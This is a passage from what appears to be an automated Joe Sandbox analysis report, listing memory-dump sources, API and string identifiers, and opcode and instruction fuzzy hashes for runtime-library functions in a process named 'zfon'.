                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96F4224), ref: 00007FF7F96F98B7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 299676f5ed099db6b6025b468dfcc04c54bdedd21b94257f90a8872ff9d81810
                                                                                                • Instruction ID: d686312a463ba2d262cb6f79fdd3693864c6c907c60f60e53255ffde148039ef
                                                                                                • Opcode Fuzzy Hash: 299676f5ed099db6b6025b468dfcc04c54bdedd21b94257f90a8872ff9d81810
                                                                                                • Instruction Fuzzy Hash: EC011260F0960261FF58FF66B949238A1B59F487B5FC04A35C63E816ECFD1C658682B2
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: b922828b7e2684afbcf6d79d91bb5d9672ec89368d0f2cf6d04bfcc6100c8038
                                                                                                • Instruction ID: 003f7ac37bac8fc062b56e1665a5ef0bf875e85ea68e28ca7509e05f8c00e089
                                                                                                • Opcode Fuzzy Hash: b922828b7e2684afbcf6d79d91bb5d9672ec89368d0f2cf6d04bfcc6100c8038
                                                                                                • Instruction Fuzzy Hash: 40F04B60E06703A6EE68BF24A989328A1B0AF487F1FC00734C53D056E8FE1C64C682B0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 96c7a756f207ce34266089aa0f1babb719ca79f35fc216322b591ea9cc0b8032
                                                                                                • Instruction ID: 9df9cfdaef4c95a5647f11534686ef3ccaa5ca598d435ece5f84ae9820173e53
                                                                                                • Opcode Fuzzy Hash: 96c7a756f207ce34266089aa0f1babb719ca79f35fc216322b591ea9cc0b8032
                                                                                                • Instruction Fuzzy Hash: 2AF04B60E16702A0EF58BB64AE4936891B09F497F1FD00B34C53D016E8FE1C658686B0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 489ec8070939499f2d05b687d8ce4eb02601b61b06c68322a53f6d41bb116b41
                                                                                                • Instruction ID: 525ca36ceca443ea756fa68c3521e68a8785691e268429ac0d030eb582484082
                                                                                                • Opcode Fuzzy Hash: 489ec8070939499f2d05b687d8ce4eb02601b61b06c68322a53f6d41bb116b41
                                                                                                • Instruction Fuzzy Hash: A5F06DA0E1A60261EF88FF24AD8933891B19F487B1FC00B34C53D017ECEE5D648682B5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2582267257-0
                                                                                                • Opcode ID: 62d9ba69d16ddf7e9d05fb0b96c0b2a14d2ee61e873a52316fb28099adf97e6b
                                                                                                • Instruction ID: 637beac15bc645a247332c1b330b80932c418988f38aee63aefc28df5a5eecae
                                                                                                • Opcode Fuzzy Hash: 62d9ba69d16ddf7e9d05fb0b96c0b2a14d2ee61e873a52316fb28099adf97e6b
                                                                                                • Instruction Fuzzy Hash: 43F0CDA0F4570291EE9CBB60AD4A339A1B5AF5D7F1FC04B34D63D016ECAE5C649642B0
                                                                                                APIs
                                                                                                • memchr.VCRUNTIME140 ref: 00007FF8B9115222
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B91152FE
                                                                                                  • Part of subcall function 00007FF8B912CAC4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B912CADE
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B911535B
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B91153F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$mallocmemchr
                                                                                                • String ID: 0123456789-
                                                                                                • API String ID: 1035304070-3850129594
                                                                                                • Opcode ID: d640ca200c76db91b86670c613c98aecf132a6b1f4fab212538182e6c2e15436
                                                                                                • Instruction ID: ab3a96addf27b8a242b4f4d9a1d30dd09bf02e61138f6f2d655e5d2ea6e43d60
                                                                                                • Opcode Fuzzy Hash: d640ca200c76db91b86670c613c98aecf132a6b1f4fab212538182e6c2e15436
                                                                                                • Instruction Fuzzy Hash: 0691A722B19AD5A9EB01DF69D4403AD23B1AB48BE8F444236CF6E13BD9EE7CD045D340
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2889003569-2084237596
                                                                                                • Opcode ID: 51865056d64403dec5eec8f15289c0db639756aedb22486eebb00ed42bb3dd8f
                                                                                                • Instruction ID: df7f1e4bff044d706f2d8ff6b31d5f63e66fd20da52b9e454675dd39a8c07a04
                                                                                                • Opcode Fuzzy Hash: 51865056d64403dec5eec8f15289c0db639756aedb22486eebb00ed42bb3dd8f
                                                                                                • Instruction Fuzzy Hash: CB919177A08B858BE724DBA8E8412AD7BA0FB447CCF105129EB8D17B95DF38D195CB00
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2889003569-2084237596
                                                                                                • Opcode ID: 38147febd4ea3e6e4a78b6d94c663964a46ac19bb27c7a49567d3dd21f0893b1
                                                                                                • Instruction ID: 88f537df7c496e5e821312dfb5aa8c2b8256f67f851ee76375f56b4820594690
                                                                                                • Opcode Fuzzy Hash: 38147febd4ea3e6e4a78b6d94c663964a46ac19bb27c7a49567d3dd21f0893b1
                                                                                                • Instruction Fuzzy Hash: DC91B073A187918AEB15CBA8E8612AD7BA0FB447C8F144129EF4D17B59DF3CE195CB00
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                • API String ID: 2943138195-757766384
                                                                                                • Opcode ID: 792524ca3cb326ee1ddc7ad9f90e01459882d709a2987deaa3b684760cdbdca5
                                                                                                • Instruction ID: e4c380f6ec8a04ba4b078085213f3cf8abfbb31142861f7f4b8632e9e249ce20
                                                                                                • Opcode Fuzzy Hash: 792524ca3cb326ee1ddc7ad9f90e01459882d709a2987deaa3b684760cdbdca5
                                                                                                • Instruction Fuzzy Hash: 2B7126B2A08A4298FB558FACD8A01B8B7A6BF057C4F845535DB4D57A99DF3CF260C300
                                                                                                APIs
                                                                                                • __except_validate_context_record.LIBVCRUNTIME ref: 00007FF8BFAD20F2
                                                                                                  • Part of subcall function 00007FF8BFAD3524: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FF8BFAD1222), ref: 00007FF8BFAD3564
                                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFAD2247
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$__except_validate_context_record
                                                                                                • String ID: $csm$csm
                                                                                                • API String ID: 3000080923-1512788406
                                                                                                • Opcode ID: d2e425a725b33c5f85093d2df621a517a4746e4d910d6925cc61b8c9293696ab
                                                                                                • Instruction ID: 1130fee300ddfa911ae23fe3739951876ea0fcdba560c38d125154e52b8e44dc
                                                                                                • Opcode Fuzzy Hash: d2e425a725b33c5f85093d2df621a517a4746e4d910d6925cc61b8c9293696ab
                                                                                                • Instruction Fuzzy Hash: DB71C03A90868197D7388FA9946167A7BE1FB01BCDF04A131EF9C47AD9CE2CD491C700
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 0-1866435925
                                                                                                • Opcode ID: 3f2737f50deef84665e9be22b47f0ec4f26eba845b90585ad8b064e2f81e60fc
                                                                                                • Instruction ID: fe23654e7ffeedb0e26c742366d7db02af61f148b756170522167579d91c90d8
                                                                                                • Opcode Fuzzy Hash: 3f2737f50deef84665e9be22b47f0ec4f26eba845b90585ad8b064e2f81e60fc
                                                                                                • Instruction Fuzzy Hash: 4C517B26608BC691EB24CF19E4903AAB760FB84F94F548136DB8D47BA4EF3DD845D700
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2889003569-2084237596
                                                                                                • Opcode ID: 82646d7cab88117c06501068e7e04168047599fc5f0013deb61a5a573c37227d
                                                                                                • Instruction ID: d658f95ec084b3011632309cdc9d17110a6464ef2c98dae8f523ba7a82e02f2b
                                                                                                • Opcode Fuzzy Hash: 82646d7cab88117c06501068e7e04168047599fc5f0013deb61a5a573c37227d
                                                                                                • Instruction Fuzzy Hash: 74619133908BC581D7618B59E4503AAB7A1FB85BD4F084225EB8D47B95DF7CE1A4CB00
                                                                                                APIs
                                                                                                • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E7622), ref: 00007FF8B90E8025
                                                                                                • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E7622), ref: 00007FF8B90E8039
                                                                                                • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E7622), ref: 00007FF8B90E80A5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: iswctype
                                                                                                • String ID: (
                                                                                                • API String ID: 304682654-3887548279
                                                                                                • Opcode ID: 90889625232b288523072e66be704fabc86384961bd469b6d4b5ec7c94db5ec1
                                                                                                • Instruction ID: ce17fe2484f278c563d225de6a2fb4781f2f023d535a6c17c81a82acd63585e5
                                                                                                • Opcode Fuzzy Hash: 90889625232b288523072e66be704fabc86384961bd469b6d4b5ec7c94db5ec1
                                                                                                • Instruction Fuzzy Hash: BA51A026E0C99381FF685F6DD9102BA62A9EF20BD8F488435EF5D46585EF7DEC438210
                                                                                                APIs
                                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E5B42), ref: 00007FF8B90E6732
                                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E5B42), ref: 00007FF8B90E6743
                                                                                                • isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E5B42), ref: 00007FF8B90E679C
                                                                                                • isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8B90E5B42), ref: 00007FF8B90E684C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: isspace$isalnumisxdigit
                                                                                                • String ID: (
                                                                                                • API String ID: 3355161242-3887548279
                                                                                                • Opcode ID: 9ada20f4e0d4e9be004ce549e3ff6164ed490b11297bdd8de5b6a3cbde90c071
                                                                                                • Instruction ID: 241a4fceb2a3fbd1f2b8140f849e68d043fd12d41e1dbce00be33b9840f1ff1e
                                                                                                • Opcode Fuzzy Hash: 9ada20f4e0d4e9be004ce549e3ff6164ed490b11297bdd8de5b6a3cbde90c071
                                                                                                • Instruction Fuzzy Hash: B1417F57D0C9C645EF248F3DE6642F96BA19F21BC8F189231CBB807586DA1DE8479710
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileHeader
                                                                                                • String ID: MOC$RCC$csm$csm
                                                                                                • API String ID: 104395404-1441736206
                                                                                                • Opcode ID: 4b6f8f644bd4ef04a393d3bb1b96f78be418c55213885cdd627a59364db23340
                                                                                                • Instruction ID: bfe9da47efd18734aa2a06cdc3e3ca81a34dfc0740784385a63d61c393f9fd90
                                                                                                • Opcode Fuzzy Hash: 4b6f8f644bd4ef04a393d3bb1b96f78be418c55213885cdd627a59364db23340
                                                                                                • Instruction Fuzzy Hash: A9519C73A1965296EAA09BAD916097D77A0FF447CAF042035EF4D47B81DF3CF8618600
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F9703550: cef_string_map_alloc.LIBCEF(?,?,?,?,00007FF7F96E7544), ref: 00007FF7F9703554
                                                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z.MSVCP140 ref: 00007FF7F96EE88A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
